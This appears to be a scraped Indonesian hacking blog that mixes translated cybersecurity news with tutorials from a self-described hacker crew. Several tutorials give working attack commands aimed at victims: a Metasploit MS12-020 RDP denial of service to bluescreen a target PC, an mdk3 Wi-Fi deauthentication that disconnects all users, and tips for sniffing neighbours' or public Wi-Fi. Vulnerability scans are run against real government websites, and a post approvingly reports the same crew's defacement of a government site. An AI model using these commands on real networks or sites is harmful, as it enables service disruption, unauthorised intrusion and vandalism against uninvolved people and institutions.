WHAT'S NEW?
Loading...

Pemimpin Kelompok Hacking yang Mencuri $1 Miliar Dari Bank Ditangkap Di Spanyol

Pemimpin Kelompok Hacking yang Mencuri $ 1 Miliar Dari Bank Ditangkap Di Spanyol - Polisi Spanyol telah menangkap pemimpin dugaan dari geng cybercrime Rusia yang terorganisir di belakang serangan malware Carbanak dan Cobalt, yang mencuri lebih dari satu miliar euro dari bank-bank di seluruh dunia sejak 2013.


Dalam operasi terkoordinasi dengan lembaga penegak hukum di seluruh dunia, termasuk FBI dan Europol, Polisi menahan pemimpin kelompok peretasan Carbanak yang dicurigai di Alicante, Spanyol.

Grup peretasan Carbanak memulai kegiatannya hampir lima tahun lalu dengan meluncurkan serangkaian kampanye serangan malware seperti Anunak dan Carbanak untuk berkompromi dengan bank dan jaringan ATM, dari mana mereka menggesek jutaan rincian kartu kredit dari pengecer yang berbasis di AS.

Menurut Europol, grup ini kemudian mengembangkan malware perbankan perusak canggih yang dikenal sebagai Cobalt, berdasarkan perangkat lunak pengujian penetrasi Cobalt Strike, yang digunakan hingga tahun 2016.


"The magnitude of the losses is significant: the Cobalt malware alone allowed criminals to steal up to EUR 10 million per heist," Europol said.

Untuk berkompromi dengan jaringan bank, kelompok itu mengirimkan email penipuan tombak berbahaya ke ratusan karyawan di berbagai bank, yang jika dibuka, komputer yang terinfeksi dengan malware Carbanak, memungkinkan peretas mentransfer uang dari bank ke rekening palsu atau ATM yang dipantau oleh penjahat.

Menurut pihak berwenang, keuntungan kriminal juga dicuci melalui cryptocurrency, melalui kartu prabayar yang terhubung ke dompet cryptocurrency, yang digunakan untuk membeli barang seperti mobil mewah dan rumah.

Pada awal 2017, geng penjahat cyber bermotif keuangan ditemukan menyalahgunakan berbagai layanan Google untuk mengeluarkan komando dan kontrol (C & C) komunikasi untuk memantau dan mengendalikan mesin korbannya.

Dalam berita terpisah, Polisi Ukraina hari ini mengumumkan penangkapan anggota lain kelompok Cobalt di Kiev, untuk mengembangkan malware dan menjual data pribadi dari warga di seluruh dunia.


Tersangka itu bekerja dengan kelompok Cobalt sejak 2016 dan juga terlibat dalam kegiatan spionase cyber. Dia diduga menjual berbagai perangkat lunak berbahaya di pasar bawah tanah yang memungkinkan siapa pun untuk mengakses dan mengendalikan komputer korban dari jarak jauh.

"This global operation is a significant success for international police cooperation against a top-level cybercriminal organisation. The arrest of the key figure in this crime group illustrates that cybercriminals can no longer hide behind perceived international anonymity," said Steven Wilson, Head of Europol’s European Cybercrime Centre (EC3).
"This is another example where the close cooperation between law enforcement agencies on a worldwide scale and trusted private sector partners is having a major impact on top-level cyber criminality."
Source : https://thehackernews.com/2018/03/carbanak-russian-hacker.html

Cara Menggunakan Dmitry

Image result for dasar lemah quotes

DIMITRY (Deepmagic Information Gathring Tools) adalah tool untuk Mencari sebuah kelemahan pada Website, tools ini hampir sama dengan Uniscan. Dmitry memilii fungsi :
beberapa fungsi-nya sebagai berikut :
1.Mengumpulkan informasi seperti Who is website atau domain dan ip
2.Mengambil informasi dari Netcraft.com
3.Melakukan pencarian sub domain dari website yang digunakan sebagai target kita
4.Mengumpulkan alamat email domain
5.Melakukan Scanning daftat port yang bersifat terbuka.

 
 -o  :untuk menyimpan hasil scannernya
-i   :untuk pencarian whois pada alamat ip dari sebuah host
-w :untuk pencarian whois pada nama domain sari sebuah host
-n  :Mengambil informasi dari Netcraft.com pada host
-s  :mencari penulusuran subdomain
-e  :mencari penulusuran e-mail
-p :melakukan port TCP scan Pada host
-f  :melakukan port TCP scan pada host menunjukan output dari laporan

Cara Scan :
- dmitry -i -w -n -o hasilscan.txt www.target.com

Setelah selesai kalian tinggal cari hasilnya di folder hasilscan.txt nanti disana ada haris/report laporan hasil scan

Semoga tutorial ini bermanfaat........  

*Penulis tampan (Damar) 

Cara BSOD Attack pada Windows

Image result for bluescreen 

BSOD Attack (BlueScreen of Death) : Sebagian dari kalian pasti tau apa itu Bluescreen dan tidak asing di telinga para pecinta IT, Bluescreen biasanya terjadi karena ada crash di bagian system komputer, namun untuk kali ini kita akan membahasa Bagaimana cara untuk membuat komputer orang terkena Bluescreen dengan cara DOS Hardisk korban dengan Metasploit.

Untuk melakukan BSOD korban harus :
- Menggunakan Sistem Operasi Windows
- Satu Jaringan 
- Korban mengaktifkan " Allow Remote Dekstop "


Langsung cara Attacknya :
1. Buka metasploit console " msf console " 
2. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 
3. set RHOST 192.168.1.45
    * set RHOST (IP korban atau Target)
4. exploit
5. Jika berhasil maka akan muncul warning
   
[+] 192.168.43.93:3389 - 192.168.43.93:3389 seems down
6. Maka secara otomatis korban akan bluescreen sendiri


Nb : * Untuk Fix yang Bluescreen cukup di Restart saja
       * Jangan terlalu sering melakukan ini karena akan merusak Hardisk
        * gunakan dengan bijak.

 Quotes : "If you break someone's heart and they still talk to you with the same excitement and respect. Believe me, they really love you."
   

Monitoring Jaringan Dengan NetDiscover

Monitoring Jaringan dengan NetDiscover, pasti ada orang yang suka atau iseng untuk "ngeRiset MiTM atau arp-spoof". ini ada tools atau alat untuk monitoringnya loh, kebanyakan orang-orang iseng suka memakainya di Wi-Fi tetangga atau @wifi.id yang di pakai oleh Public. jadi kalian perlu Waspada karna banyak orang yang suka iseng untuk melihat lihat dalaman isi hp anda seperti saya hehe.

Related image

Kalo untuk user atau pengguna Windows biasanya menggunakan NetView di cmd dengan command "net view". Nah untuk pengguna Kali Linux atau Linux saya lebih merekomendasikan menggunakan NetDiscover ini hehe.

untuk menjalankannya biasanya kita tinggal mengkil di pojok kiri atas 
Applications> Information Gath> NetDiscover. 
atau unuk Menginstallnya dengan mengetikan command di Terminal Linux dengan command :

apt-get install netdiscover
Tunggu hingga proses install selesai

ifconfig wlan0 mon8



* wlan0 mon8 adalah interface yang kalian gunakan bisa wlan0 atau wlan0mon8

netdiscover -i wlan0mon8

   
 Maka akan terlihat para user dari Wi-Fi yang digunakan, pasti kalian penasaran gimana sih cara sniffing nya? nah untuk sniffing sendiri biasa saya padukan dengan Netdiscover, Ettercap, dan driftnet. Saran dari saya kalo gunakan tools ini di Publik hati-hati ya, karena ini merupakan tindakan Ilegal, melihat dalaman hp korban.

Untuk tutorial Sniffing akan kami bikin nanti jadi tetep tunggu aja yaaaa...
Semoga bermanfaat byeeeeeeee.

*Quotes: Aku diam karna aku sadar aku bukan siap-siapa mu, tapi suatu saat akan kubalas dendam dengan kesuksesan ku nanti 

Perangkat Lunak Malware Pra-Install Ditemukan di 5 Juta Ponsel Android Populer

Perangkat Lunak Malware Pra-Install Ditemukan di 5 Juta Ponsel Android Populer - Peneliti keamanan telah menemukan kampanye malware terus berkembang besar-besaran yang telah menginfeksi hampir 5 juta perangkat mobile di seluruh dunia.

Dijuluki RottenSys, malware yang disamarkan sebagai aplikasi 'System Wi-Fi service' telah terinstal pada jutaan smartphone baru yang diproduksi oleh Honor, Huawei, Xiaomi, OPPO, Vivo, Samsung dan GIONEE - menambahkan di suatu tempat di sepanjang rantai pasokan.
Semua perangkat yang terkena dampak ini dikirim melalui Tian Pai, distributor ponsel berbasis Hangzhou, namun para periset tidak yakin apakah perusahaan tersebut memiliki keterlibatan langsung dalam kampanye ini.



Menurut Tim Keamanan Check Point Mobile, yang menemukan kampanye ini, RottenSys adalah perangkat lunak berbahaya yang tidak menyediakan layanan terkait Wi-Fi aman namun memerlukan hampir semua izin Android yang sensitif untuk mengaktifkan aktivitas jahatnya.
"According to our findings, the RottenSys malware began propagating in September 2016. By March 12, 2018, 4,964,460 devices were infected by RottenSys," researchers said.
Untuk menghindari deteksi, aplikasi layanan Wi-Fi Sistem palsu awalnya tidak mengandung komponen berbahaya dan tidak segera memulai aktivitas berbahaya apa pun.

Sebagai gantinya, RottenSys telah dirancang untuk berkomunikasi dengan server komando dan kontrolnya untuk mendapatkan daftar komponen yang dibutuhkan, yang berisi kode berbahaya yang sebenarnya.
RottenSys kemudian mendownload dan menginstal masing-masing sesuai dengan itu, dengan menggunakan izin "DOWNLOAD_WITHOUT_NOTIFICATION" yang tidak memerlukan interaksi pengguna.


Hacker memperoleh $ 115.000 dalam Hanya 10 Hari Terakhir


Pada saat ini, kampanye malware besar-besaran mendorong komponen adware ke semua perangkat yang terinfeksi yang secara agresif menampilkan iklan di layar awal perangkat, seperti jendela pop-up atau iklan layar penuh untuk menghasilkan pendapatan iklan yang tidak benar.
"RottenSys is an extremely aggressive ad network. In the past 10 days alone, it popped aggressive ads 13,250,756 times (called impressions in the ad industry), and 548,822 of which were translated into ad clicks," researchers said.
Menurut periset Checkpoint, malware tersebut telah membuat pengarangnya lebih dari $ 115.000 dalam 10 hari terakhir saja, namun penyerangnya sampai pada "sesuatu yang jauh lebih merusak daripada sekadar menampilkan iklan tak diundang".

Sejak RottenSys telah dirancang untuk mendownload dan menginstal komponen baru dari server C & C, penyerang dapat dengan mudah membuat persenjataan atau mengendalikan penuh jutaan perangkat yang terinfeksi.
Investigasi tersebut juga mengungkapkan beberapa bukti bahwa penyerang RottenSys telah mulai mengubah jutaan perangkat yang terinfeksi tersebut menjadi jaringan botnet raksasa.

Beberapa perangkat yang terinfeksi telah ditemukan memasang komponen RottenSys baru yang memberi kemampuan penyerang lebih luas, termasuk diam-diam memasang aplikasi tambahan dan otomatisasi UI.
"Interestingly, a part of the controlling mechanism of the botnet is implemented in Lua scripts. Without intervention, the attackers could re-use their existing malware distribution channel and soon grasp control over millions of devices," researchers noted.

Cara Mendeteksi dan Menghapus Malware Android?
Untuk memeriksa apakah perangkat Anda terinfeksi malware ini, masuk ke pengaturan sistem Android → App Manager, lalu cari beberapa jenis paket malware yang mungkin terjadi: - com.android.yellowcalendarz (每日 黄 历) - com.changmi.launcher (畅 米 桌面) - com.android.services.securewifi (系统 WIFI 服务) - com.system.service.zdsgt Jika salah satu di atas ada dalam daftar aplikasi terinstal Anda, cukup copot pemasangannya.
Source : https://thehackernews.com/2018/03/android-botnet-malware.html

Cara menggunakan OWASP web Scanner

Open Web Application Security Project (OWASP) adalah aplikasi Pentest Scanner Vuln website, Tools ini tersedia di OS Kali Linux. OWASP sendiri adalah kembarannya dari Accunetix atau alat Pentest website yang ada dalam Windows, namu OWASP hanya ada di Kali Linux.


Keunggulan dari Tools ini adalah :
  • Open Source
  • Mudah diinstall
  • Free
  • Community Based
  • Intercepting Proxy
  • Traditional & Ajax Spider
  • Active Scanner
  • Forced Browsing
  • Fuzzer
  • Dynamic SSL cerificates
  • Smart Card Support
  • Web Socket Support
  • Integrared and growing Add Ons

Dibandingkan Accunetix tools ini sudah pasti lebih enak untuk dipakai oleh orang awam

Cari target lalu masukan du URL To attack lalu klik Attack


Maka secara otomatis semuanya akan terbuka dari bug XSS, SQL-i, RFI, Admin Log, LFI, Directory, SSL, dan dB dari website tersebut. bahkan kita bisa melihat user/ password adminnya loh kalo beruntung hehe.. Inget tools ini bisa kita temukan di Kali Linux untuk Pentest di Windows saya hanya mengandalkan Accunetix dan saya kira tidak usah di ajarkan lagi karena caranya sangat mudah.

Cukup sekian semoga bermanfaat dapat di cerna dengan baik.


Cara Memutuskan Jaringan Wi-Fi dengan Kali Linux (MDK3)


Cara Memutuskan Jaringan Wi-Fi dengan MDK3 - MDK3 sendiri adalah tools Pentest (Penetration Test) dari Kali Linux, fungsi tools ini biasanya dipakai untuk memutuskan jaringan Wi-Fi mungkin bagi user android bisa menggunakan Net-Cut.

Ikutin aja tutornya:
1. Buka Terminal Linux lalu ketik "ifconfig" maka secara langsung akan terlihat IP addres kita Setelah  terlihat, lalu kita copy alamat ether kita lalu save di document root dan save dengan nama "test.txt"

2. Buka Terminal lagi lalu ketikan
 root@Alazka:~# iw wlan0 interface add mon8 type monitor
 root@Alazka:~# mdk3 mon8 d -w test.txt

Maka Otomatis seluruh Device yang Konek pada Wi-Fi akan terputus dengan sendirinya, jika ingin berhenti anda hanya cukup menutup terminal tersebut dan jaringan akan Normal kembali seperti biasa
pasti ada yang bertanya
" apa sih maksud dari mdk3 mon8 d -w test.txt? "

jadi : mdk3 itu adalah perintah untuk mengaktifkan mdk3, lalu mon8 adalah        jenis interface yang digunakan, d adalah kata lain dari Document, dan -w adalah perintah untuk membuka alamat ether kita, lalu test.txt adalah nomor ether kita sendiri.

Kalo tidak jelas liat video ini.
 
Cukup Sekian tutornya semoga bermanfaat
cmiwiw

Admin Finder LOKOMEDIA || J3pa7 Finder V.1


Admin Finder Lokomedia J3pa7 Finder V.1 Rilis, tools ini bisa digunakan untuk pengguna Linux, Windows, MacOs.
Link/URL:
https://pastebin.com/raw/n9BGaXAT

caranya?
- Copy dan paste di text editor lalu save dengan nama (sesukalu).pl
- ketik "perl (sesukalu).pl"
- lalu masukan target
- Pilih model yang kira2 digunakan, tapi biasanya sih .php


Cukup sekian semoga bermanfaat

*Nb: Kalo mau share sertain Copyright mzz......

©Alazka-HunterSecCrew




(Tutorial) Cara Scan Celah pada Website Dengan Kali Linux (UNISCAN)



Uniscan adalah tools Pentest (Penetration Testing) yang disediakan oleh kali linux. Fungsi dari Uniscan sendiri ialah untuk men-Scan (memeriksa) celah/bug yang ada pada website. Biasanya juga digunakan para Defacer untunk mencari Admin page pada suatu website, shell backdoor pada website, dan Uploader pada website. tools ini juga bisa mencari sampai directory website loh hehe. Yuk langsung belajar.


Oke sekarang kita coba untuk scan website http://dinsos.sumutprov.go.id/ cara scan nya adalah         

                              "uniscan -u http://bkpsdm.sukabumikab.go.id/ -qweds"

Fungsi/ penjelasan dari "qweds"
-q > untuk periksa directory (biasana admin page gan)
-w > untuk periksa file
-q > untuk periksa robots.txt 
-d > celah pada website tersebut
-s > statistik



 Pada kotak yang pertama itu adalah penjelasan tentang nama Domain, Server, dan IP
| Domain: http://bkpsdm.sukabumikab.go.id/
| Server: LiteSpeed
| IP: 103.15.226.14


Pada kotak yang kedua adalah hasil dari Scan Directory website tersebut, biasanya menampilkan /image , /file, /admin, dll.
| Directory check:
| [+] CODE: 200 URL: http://bkpsdm.sukabumikab.go.id/cpanel/
| [+] CODE: 200 URL: http://bkpsdm.sukabumikab.go.id/home/



 Pada kotak yang ketiga dan ke empat adalah Penjelasan tentang File-file dalam Directorynya dan juga memeriksa robots.txt (kalo webnya ada robots.txt ke scan ya gan)
| File check:
| [+] CODE: 200 URL: http://bkpsdm.sukabumikab.go.id/index.php
| [+] CODE: 200 URL: http://bkpsdm.sukabumikab.go.id/mailman/listinfo
| [+] CODE: 200 URL: http://bkpsdm.sukabumikab.go.id/webmail/horde/test.php
| [+] CODE: 200 URL: http://bkpsdm.sukabumikab.go.id/webmail/blank.html

 Pada kotak kotak selanjutnya biasanya adalah Hostingan website tersebut, email admin webnya terus sama Bug atau celah pada website tersebut.

oke cukup sekian tutorial kali ini, semoga bisa anda pakai sampai masa yang akan datang (user Kali Linux, I Love You :*)


Dinsos Sumatera Utara di Retas dan menampilkan sebuah Pesan

Dinsos Sumatera Utara di Retas dan menampilkan sebuah Pesan - Kali ini kasus peretasan melanda Dinas Sosial Provinsi Sumatera Utara, seorang Hacker bernama Alazka dari Team Hunter Security Crew (Waduh team ini). Pelaku meninggalkan pesan berupa tulisan dan Gambar ir.Soekarno, dan juga membawa nick teman hacker lainya.


Pelaku Merusak Halaman Depan situs dinsos.sumutprov.go.id. Mereka hanya men-deface direktori templates. Beberapa nama hacker lainya juga terpampang di situs tersebut

Inilah pesan yang disampaikan oleh Hacker Alazka :

[Msg]
.............. 
Sadarkah kalian, makan sepuasnya dengan uang negara, sadarkah kalian, bertingkah seenaknya dengan undang-undng kalian, sadarkah kalian, menyakiti kami dengan senjata-senjata kalian yang tak luput dari uang negara, sadarkah kalian, bahwa kalian sudah menganggap kami sebagai sampah. Apabila usul selalu di tolak tanpa di timbang, suara di bungkam, kritik di larang tanpa alasan, dituduh subversif dan mengganggu keamanan, maka cuma ada satu kata untuk hal itu LAWAN... 


Mereka hanya men-deface sampai berita ini dirilis belum ada perbaikan dari situs terkait, Namun kalian juga dapat mengakses mirrornya di alamat:

https://defacer.id/archive/mirror/939964

Sekian Berita kali ini dan selamat beristirahat. (./Fruu)

2.500 Remaja Berpartisipasi dalam Kompetisi Keamanan Cyber ​​yang Didukung Pemerintah

2.500 Remaja Berpartisipasi dalam Kompetisi Keamanan Cyber ​​yang Didukung Pemerintah - Lebih dari dua ribu pemrogram remaja Inggris yang paling berbakat telah ikut serta dalam kompetisi keamanan cyber yang didukung pemerintah.


Secara keseluruhan, sepuluh tim berpartisipasi dalam kompetisi final CyberCenturion, yang dijalankan oleh Cyber ​​Cyber ​​Security Challenge UK dan perusahaan teknologi pertahanan Northrop Grumman.

Para remaja ditugaskan untuk bertindak sebagai profesional keamanan cyber di perusahaan game buatan.

Mereka kemudian diminta untuk mencari cara untuk mengamankan perusahaan setelah mereka menjadi sasaran penjahat cyber.

Skenarionya diciptakan oleh para ahli teknologi untuk membuat orang muda tertarik dengan karir STEM, terutama keamanan dunia maya.

Bekerja untuk perusahaan fiktif ini, tim mengembangkan keterampilan di bidang-bidang seperti jaringan, sistem penyimpanan kritis dan keamanan cyber.

Penyelenggara menjelaskan bahwa "tema game dipilih untuk alur cerita seperti game dan hobi yang semakin banyak didigitalkan".

Tantangannya ditujukan untuk mengekspos anak muda ke "potensi bahaya yang terkait dengan game online". Sebuah perjalanan ke AS diberikan sebagai hadiah untuk para pemenang.

Oliver Dowden, menteri implementasi di Kantor Kabinet, mengatakan bahwa ada kebutuhan penting bagi profesional keamanan cyber dalam ekonomi yang saling terkait saat ini.

"Sebagai Strategi Keamanan Cyber ​​Nasional kami menyoroti, sangat penting bahwa kita mengembangkan keterampilan dan kemampuan yang kita butuhkan untuk mengatasi tantangan yang kita hadapi," katanya.

"Kami hanya bisa berhasil jika bekerja sama dengan organisasi seperti Northrop Grumman dan Cyber ​​Security Challenge untuk menginspirasi generasi profesional dan pengusaha keamanan cyber.

"Sangat fantastis melihat begitu banyak kaum muda memanfaatkan kesempatan menarik yang dibawa kompetisi ini - selamat kepada mereka semua."

Para peserta dihadapkan pada sejumlah besar tes intensif untuk masuk ke dalam tim. Ini berlangsung di Wilayah Inggris dan Luar Negeri selama enam bulan.

Andrew Tyler, chief executive Northrop Grumman Europe, menambahkan: "Menciptakan kesadaran yang lebih besar akan STEM dan membangun tenaga kerja yang lebih beragam adalah keharusan global, dan CyberCenturion mempelopori upaya ini, membantu mengatasi kebutuhan mendesak untuk menumbuhkan bakat cyber di masa depan.

"CyberCapeion terus tumbuh dan memberi kesempatan untuk melibatkan kaum muda yang penasaran dengan teknologi dan keamanan dunia maya, dan sangat ingin menerapkan keahlian mereka saat ini. Kami menantikan kompetisi final nasional yang mengasyikkan."


Hacker Meretas Portal Berita Arrahmah dan Menantang Muslim Cyber Army (MCA)

Hacker Meretas Portal Berita Arrahmah dan Menantang Muslim Cyber Army (MCA) - Menurut deskripsinya, Arrahmah.com merupakan anak perusahaan dari Ar Rahmah Media Network, sebuah jaringan media Islam yang bertujuan memberikan informasi berimbang tentang Islam dan dunia Islam di tengah-tengah arus informasi modern dan globalisasi.

Situs ini pernah diblokir oleh kominfo karena dianggap situs simpatisan radikalisme meskipun akhirnya dilepas kembali dengan alasan mereka telah beretikat baik dan menjalin komunikasi dengan Kemenkominfo.

Baru-baru ini, peretas yang tidak diketahui dentitasnya meretas arrahmah.com dengan meninggalkan pesan bernada tantangan terhadap kelompok yang sedang viral akhir-akhir ini yakni Muslim Cyber Army (palsu).

Berikut pesan yang ditinggalkan oleh pelaku:



#RIPMCA KAMI MENGAJAK PERANG TERBUKA KEPADA SELURUH MCA (MUSLIM CYBER ARMY) !!
SKILL ANDA SKILL SAMPAH TIDAK PUNYA SKILL HACKER YANG BAGUS
PERHATIAN UNTUK PARA MCA JANGAN BELAGU MENGAKU PUNYA SKILL TAPI SKILL SAMPAH
JANGAN MENJUAL AGAMA/MENGATASNAMAKAN AGAMA , KALIAN LEBIH KEJAM DARI PADA IBU TIRI

Sampai berita ini dirilis belum ada perbaikan dari situs terkait. Untuk mirrornya bisa juga diakses melalui link berikut:

  • http://zone-h.org/mirror/id/30902262
Menurut informasi yang kami dapat, selain Arrahmah.com, pelaku juga meretas situs lain yang sejenis. Berikut daftarnya:
  • arrahmah.id
  • arrahmah.net
  • risalahmujahidin.com
  • abujibriel.com
  • dakwah.id
  • jihadzone.com
Sekian berita malam hari ini. Selamat beristirahat. (./Fruu)

NSA Dump membocorkan Alat yang digunakan untuk melacak Hacker !!

NSA Dump membocorkan Alat Badan yang digunakan untuk melacak Hacker !! - Beberapa tahun yang lalu ketika kelompok hacking misterius 'The Shadow Brokers' mencampakkan sejumlah besar data sensitif yang dicuri dari badan intelijen AS NSA, semua orang mulai mencari alat hacking rahasia dan eksploitasi zero-day.

Sekelompok peneliti keamanan Hungaria dari Lab CrySyS dan Ukatemi sekarang telah mengungkapkan bahwa NSA Dump tidak hanya mengandung eksploitasi zero-day yang digunakan untuk mengendalikan sistem yang ditargetkan, namun juga mencakup kumpulan skrip dan alat pemindai yang digunakan agen untuk melacak operasi hacker dari negara lain.



Menurut sebuah laporan yang diterbitkan hari ini oleh Intercept, tim khusus NSA yang dikenal dengan sebutan Territorial Dispute (TeDi) mengembangkan beberapa skrip dan alat pemindaian yang membantu agen tersebut untuk mendeteksi hacker negara-bangsa lainnya pada mesin yang ditargetkan yang terinfeksi.

NSA hacker menggunakan alat ini untuk memindai sistem yang ditargetkan untuk 'indikator kompromi' (IoC) guna melindungi operasinya sendiri agar tidak terpapar, dan juga untuk mengetahui aktor ancaman asing yang mencuri dan teknik hacking yang mereka gunakan.
"When the NSA hacks machines in Iran, Russia, China and elsewhere, its operators want to know if foreign spies are in the same machines because these hackers can steal NSA tools or spy on NSA activity in the machines," the publication reports. 
"If the other hackers are noisy and reckless, they can also cause the NSA's own operations to get exposed. So based on who else is on a machine, the NSA might decide to withdraw or proceed with extra caution."
Tim Sengketa Teritorial NSA mengelola database tanda tangan digital, seperti sidik jari untuk arsip dan cuplikan dari berbagai kelompok hacking, untuk melacak operasi APT untuk atribusi.
nsa-hacking-toolsMenurut para periset, ketika Broker Shadow berhasil meng-hack jaringan NSA dan mencuri satu koleksi file sensitif pada tahun 2013, agensi tersebut melacak setidaknya 45 kelompok APT yang disponsori negara.

Tampaknya juga hacker NSA melacak beberapa alat dari Dark Hotel di tahun 2011 - sekitar 3 tahun sebelum komunitas keamanan menemukan kelompok hacking.
Dark Hotel adalah grup spionase cyber canggih yang diyakini berasal dari Korea Selatan, yang terkenal dengan penargetan jaringan Wi-Fi hotel untuk memata-matai eksekutif tingkat senior di organisasi manufaktur, pertahanan, investasi modal, ekuitas swasta, industri otomotif dan lainnya.
Kelompok peneliti telah merencanakan untuk merilis temuan skrip dan alat pemindaian NSA minggu ini di Kaspersky Security Summit di Cancun, yang akan membantu periset lain untuk menggali data dan mengidentifikasi lebih banyak kelompok APT yang sedang diburu NSA.
"The team also hopes the information will help the community classify some malware samples and signatures that have previously been uncovered by the security community but remain unattributed to a specific threat group because researchers don’t know to which advanced hacking group they belong," the Intercept says.
Kriptografi dan Keamanan Sistem (CrySyS Lab) terkenal karena mengungkap alat mata-mata Israel yang disebut Duqu pada tahun 2011, yang diyakini dikembangkan oleh hacker Israel yang sama yang membantu A.S. untuk mengembangkan malware Stuxnet yang terkenal karena menyabotase program nuklir Iran.

Badan Pemerintah NSW di Retas dan membutuhkan 49 Hari pada Perbaikan Keamanan Cyber !!

Badan Pemerintah NSW di Retas dan membutuhkan 49 Hari pada Perbaikan Keamanan Cyber !! - Sebuah laporan baru-baru ini mengenai keamanan cyber di dalam layanan publik telah menyatakan bahwa dibutuhkan satu Pemerintah NSW sekitar 49 hari untuk mematikan hack! Upaya kecurangan finansial yang terjadi pada tahun 2017 melibatkan penyedia sistem TI dari sebuah badan pemerintah dan mencoba menyebarinya sebelum dilacak, dihentikan dan akhirnya ditutup. Studi kasus ini sebenarnya adalah bagian dari laporan baru-baru ini oleh auditor negara bagian, Jenderal Margaret Crawford.

Dia menyerukan perbaikan cepat dan segera dalam kemampuan sektor publik untuk mengatasi masalah alam ini. Dia berpandangan bahwa saat ini, ada risiko bahwa kecurangan dan kejahatan cyber-security ini akan berlangsung lebih lama dari seharusnya. Kejahatan cyber-keamanan ini mengancam pemerintah dan bahkan dapat menyebabkan kerugian bagi penyampaian layanan pemerintah yang mengakibatkan peretasan informasi pribadi, data rahasia, dan penolakan akses terhadap teknologi.

Dalam insiden khusus ini, akun hacked mengirimkan sekitar 450 email palsu.
Studi kasus ini pada dasarnya dimulai dengan ID email yang dikompromikan dan menyebabkan penutupan sistem pembayaran keuangan lembaga ini.
Enam hari kemudian, akun yang diretas mengirim email palsu yang dimaksudkan untuk menipu penerima dalam upaya mendapatkan kredensial staf keuangan.
Dua minggu kemudian, penyedia TI dari lembaga tersebut menemukan faktur palsu dan mengangkat insiden tersebut ke status utama.

Semua pengguna akun email dari agensi tersebut sangat disarankan untuk mengganti kata sandinya namun bahkan setelah tindakan ini, pada hari ke 20, akun yang diretas telah mengirimkan 450 pesan palsu dan hampir 300 anggota staf telah mengeklik tautan yang dikirimkan email tersebut.
Memotong cerita panjang pendek, gerbang pembayaran agen akhirnya dibuka kembali setelah banyak usaha pada hari ke-49!

Kejadian ini menunjukkan celah yang dimiliki lembaga tersebut dalam sistem keamanan TI dan menyoroti fakta bahwa pihaknya perlu segera ditingkatkan untuk menghindari insiden yang tidak menyenangkan di masa depan.

Source: http://www.abc.net.au/news/2018-03-02/cyber-security-in-nsw-public-sector-needs-improvement/9503250 (./Fruu)

Twitter Kominfo Dibully Netizen karena Memblokir Tumblr !!

Twitter Kominfo Dibully Netizen karena Memblokir Tumblr -  Lagi-lagi Kominfo membuat tindakan yang membuat netizen geram. Baru baru ini, mereka memblokir Tumblr dengan alasan konten pornografi. Hal tersebut tentu mengundang kemarahan netizen termasuk para penulis dan ilustrator yang menggunakan Tumblr sebagai media publikasinya.


Sebagian besar netizen menilai langkah yang diambil Kominfo dengan memblokir Tumblr sebagai langkah yang tidak jelas. Pasalnya, konten yang muncul dalam Tumblr beragam disesuaikan dengan penggunanya. Tidak logis jika Tumblr diblokir dengan alasan konten pornografi hanya karena ditemukan 360 akun asusia disana.

Akun @shandya contohnya. Dia menulis bahwa tindakan Kominfo yang memblokir Tumblr ini seperti membakar sebuah hutan hanya untuk membasmi satu ekor cacing. Dia juga menambahkan data bahwa 360 akun itu bahkan tidak sampai 1% dari total 392 juta akun yang berada di Tumblr.


Akun @littlechobo15 bahkan menyindir lebih keras. Dia menjelaskan di Tumblr sendiri ada fitur safe mode untuk menghindarkan pengguna dari konten asusila. Saking geramnya, dia bahkan menyuruh Kominfo untuk sekalian memblokir Google dan Twitter.


Akun @Lrzyw juga menambahkan, di Twitter pun kalau soal konten porno pasti ada. Dan dilihat dari sisi user, Twitter jelas lebih populer dari Tumblr. Dia pun menyarankan untuk memblokir Twitter sekalian.


Banyak pula netizen yang tidak mampu menyembunyikan kemarahannya atas kebijakan “konyol” Kominfo. Akun @cyntsh contohnya. Menurutnya, pemblokiran ini hanya akan merugikan user yang menggunakan Tumblr untuk berkarya. Daripada main blokir, lebih baik dilakukan edukasi pengguna.


Masih banyak kicauan kicauan lain yang ditujukan ke akun milik @kemkominfo di Twitter. Rata-rata memang menunjukkan ketidakpuasan terhadap langkah yang diambil Kominfo tersebut.

Sampai berita ini dirilis belum ada tanggapan Kominfo menyikapi kritikan dari netizen tersebut. DNS dari Tumblr juga masih diblokir sehingga untuk mengakses Tumblr harus menggunakan VPN. (./Fruu)

Inilah Layanan VPN yang melindungi privasi Anda secara online di tahun 2018 !!

Inilah Layanan VPN yang melindungi privasi Anda secara online di tahun 2018 !! - Dalam kontras dengan pengawasan internet yang berkembang, penggunaan layanan VPN telah melihat pertumbuhan yang cukup sehingga di sini daftar layanan VPN yang telah dikumpulkan oleh TorrentFreak yang terbukti melindungi privasi pengguna.
Sebagian besar layanan VPN mencatat data aktivitas pelanggan mereka secara online yang digunakan untuk mengidentifikasi orang-orang tertentu dalam sistem periklanan dan pemasaran mereka. 


Sebaiknya diperhatikan bahwa semua layanan VPN tidak memberikan privasi yang cukup kepada konsumen dan tidak semua algoritma memberikan enkripsi terbaik, Dikatakan PPTP yang rentan dan kunci bersama juga membawa risiko sehingga lebih baik memilih layanan VPN yang mengikuti praktik keamanan yang baik.

1. PRIVATE INTERNET ACCESS


Menurut perusahaan Private Internet Access, mereka menyatakan bahwa mereka tidak menyimpan log internet yang berkaitan dengan lalu lintas, sesi pengguna, alamat IP, dan cap waktu. Cabang perusahaan berlokasi di London, AS, dan Islandia yang tidak memiliki kebijakan penyimpanan data wajib

2. NORD VPN


Perusahaan terdaftar di Tefincom co S.A dan beroperasi di bawah yurisdiksi Panama, Mereka telah mengembangkan alat otomatis yang membatasi koneksi maksimal ke 6 perangkat dalam sebuah sesi selain itu mereka menggunakan Google Analytics untuk retensi pengguna dan Meja Zen sebagai platform Tiket. Kebijakan Zero-log perusahaan mereka mencegah mereka untuk mencatat data pelanggan apa pun.

3. EXPRESS VPN


Express VPN didirikan di British Virgin Islands di bawah yurisdiksi BVI yang terutama berfokus pada privasi orang-orang karena BVI tidak mengikuti undang-undang retensi data dan juga bukan bagian dari perjanjian berbagi intelijen dengan Mata. Perusahaan memiliki perlindungan dari penjangkauan legal. Mereka menggunakan Zendesk untuk dukungan dan penanganan tiket.

4. IPREDATOR


Perusahaan mengatakan bahwa data No Log akan dipertahankan yang memungkinkan agen melacak pengguna kembali. Setelah sesi pengguna dihentikan, seluruh data sesi akan dihapus dari database perusahaan. Perusahaan beroperasi di bawah PrivActually Ltd yang berada di Siprus. Mereka juga menyediakan BitTorrent dan File-Sharing Traffic.

5. TOR GUARD


